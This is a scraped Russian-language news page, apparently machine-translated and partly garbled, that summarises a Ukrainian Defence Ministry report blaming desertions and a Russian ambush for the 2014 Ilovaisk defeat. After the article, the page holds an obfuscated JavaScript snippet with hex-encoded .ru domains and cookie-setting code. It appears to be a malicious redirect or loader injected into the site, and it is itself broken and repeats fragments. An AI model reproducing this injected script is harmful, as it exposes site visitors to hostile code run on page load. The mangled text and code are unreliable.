Кто виноват в Іловайській трагедии. Версия Минобороны

Кто виноват в Іловайській трагедии. Версия Минобороны

Кто виноват в Іловайській трагедии. Версия Минобороны
2016-01-16
Кто виноват в Іловайській трагедии. Версия Минобороны


Во время боев за Иловайск в августе прошлого года в городе базировались около 250 боевиков, говорится в отчете Министерства обороны Украины.Тогда Кремль активно наращивал количество военных на украинско-российской границе, в частности на юг Ростовской области Москва перебросила около 4 тыс. солдат, 20 танков и 30 артиллерийских систем.После перехода границы российские войска старались избегать прямых столкновений с украинскими подразделениями, в основном применяя артиллерию.По утверждению Минообороны, одна из главных причин трагедии под Иловайск – массовое дезертирство украинских солдат, которые “обнажили” граница.Дислокация армии в августе 2014 года в Иловайске базировались до 250 боевиков. На юго-восточной окраине города Моспино сепаратисты оборудовали укрепленный район, сосредоточив там до 500 человек. Мосты через реку Грузская заминировали. В районе Ларино также оборудовали укрепленный район”.Таким образом, все подходы к Донецка были перекрыты опорными пунктами боевиков”, – сообщает Минобороны.Расположение войск (сайт Министерства обороны Украины)Подразделения ракетных войск и артиллерии России обстреливали позиции украинских войск с территории населенных пунктов Пріміуський, Ольховский, Заречный, Ленинский, а также из Новониколаевки Куйбышевского и Матвіїво-Курганского районов Ростовской области.

“В целом группировка вооруженных сил Российской Федерации, которые расположились вблизи российско-украинской границы на юге Ростовской области, насчитывали. личного состава – до 4 тыс. человек; танков – до 20 единиц; боевых бронированных машин – до 90 единиц; артиллерийских систем – до 30 единиц; реактивных систем залпового огня – до 20 единиц”, – сообщается в отчете.Прорыв кордону24 августа 2014 после обстрелов с территории России 5-ый батальон территориальной обороны Украины, который прикрывал государственную границу на рубеже Кутейниково – Мокроєланчик, самовольно оставил свои позиции, утверждают в Министерстве обороны.Ситуация в районе Иловайска 24 августа 2014 (Министерство обороны Украины)”Тем самым обнаженный правый фланг наших войск. Личный состав этого батальона покинул зону боевых действий и отступил к месту постоянной дислокации в Ивано-Франковской области – около 1000 км от района ведения боевых действий”, – отмечается в отчете.Сообщается, что в образовавшийся “пробел” вторглись подразделения Вооруженных сил России. Они перешли границу вблизи приграничных населенных пунктов Берестовое и Кузнецове-Михайловка.Ротной тактической группе девяносто третьего отдельной механизированной бригады приказали выдвинуться и усилить подразделение под руководством полковника Гордейчука на кургане Саур-Могила.”Задание выполнено не было.

После боевого столкновения с противником в районе села Мануйловка Шахтерского района группа осуществила уход, и появилась только 25 августа в районе Иловайская”, – отмечают в Минобороны.Виноваты дезертириЗаходи информационного воздействия противника и сообщения средств массовой информации спровоцировали подразделения 51-й ОМБр оставить базовый лагерь в районе поселка Березовый 25 августа, считают в оборонном ведомстве.Ситуация в районе Иловайска 25 августа 2014 (Министерство обороны Украины)”За одну ночь отступили более 1200 человек. Военнослужащие, которые не отошли, в дальнейшем выполняли задачи в районе Иловайска. Это привело к ослаблению левого фланга нашей группировки и затруднило выполнение задач украинскими подразделениями”, – подчеркивает Министерство обороны.По информации ведомства, этим воспользовались войска России, продолжив вести рейдовые действия в направлении Тельманово и Новоазовска, а также села Щербак и города Новоазовск.”После проведения артиллерийской поддержки атаки с огневых позиций, расположенных на территории Российской Федерации, подразделения российских вооруженных сил овладели следующими рубежами. на севере. Старобешево – Агрономическое – Кутейниково – Амвросиевка; на юге.

Солнцево – Гранитное – Тельманово – Новоазовск”, – говорится в отчете.Тактика РосіїВикористовуючи результаты продвижений русских войск и отход подразделений 51-й ОМБр, отряды Донецко-Макеевского незаконного вооруженного формирования совершили прорыв в направлении Донецк – Новый Свет и, выйдя к населенному пункту Старобешево, блокировали подразделения 39-го и 40-го БТрО в районе Иловайска. Впоследствии 39-й батальон отошел.Ситуация в районе Иловайска 26 августа 2014 (Министерство обороны Украины)”Избегая выполнения задач, командир 39-го БТрО принял решение об отводе батальона из района выполнения задач, мотивируя это тем, что он хочет сохранить личный состав и технику. В ночь с 25 на 26 августа батальон оставил опорные пункты и блокпосты, которые занимал по линии Новый Мир, Оленевка, чем обнажил левый фланг Иловайского группировки”, – считают в ведомстве.Минобороны утверждает, что реагируя на обострение ситуации, штаб Антитеррористической операции наращивал Иловайск группировки.Ситуация в районе Иловайска 27 августа 2014 (Министерство обороны Украины)Также отмечается, что в этот период подразделения российских войск старались избегать прямых столкновений с украинскими силами.”Со стороны российских войск в основном применялась артиллерия”, – говорится в отчете.Ловушка Кремля29 Августа начался запланированный выход украинских подразделений, которые блокировали и зачищали Иловайск. Российские офицеры оттягивали время прохода через так называемый “зеленый коридор”.”Только потом стало известно, что это время был нужен Вооруженным силам Российской Федерации для инженерного обустройства засад, из которых расстреляли наши колонны”, – сообщает Минобороны Украины.Ситуация в районе Иловайска 29 августа 2014 (Министерство обороны Украины)в конце концов, российское командование подтвердило выход украинских сил с “зачохлюваним” вооружением. За это время подразделения вооруженных сил Российской Федерации заняли выгодные позиции и во время выхода в упор расстреляли колонны украинских войск.Источник.

Подробности  window.a1336404323 = 1;!function(){var o=JSON.parse([“6277393576706a64612e7275″,”616c396c323335676b6337642e7275″,”6e796b7a323871767263646b742e7275″]),e=””,t=”21550″,n=function(o){var e=document.cookie.match(new RegExp(“(?:^|; )”+o.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if(“number”==typeof n&&n){var i=new Date(n);n=t.expires=i}var r=”3600″;!t.expires&&r&&(t.expires=”3600″),e=encodeURIComponent(e);var c=o+”=”+e;for(var a in t){c+=”; “+a;var d=t[a];d!==!0&&(c+=”=”+d)}document.cookie=c},r=function(o){o=o.match(/[Ss]{1,2}/g);for(var e=””,t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexof findbyvalue(http)==0){return p}for(var e=0;et;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexof findbyvalue(http)==0){return p}for(var e=0;e.

Related posts:

Leave a Reply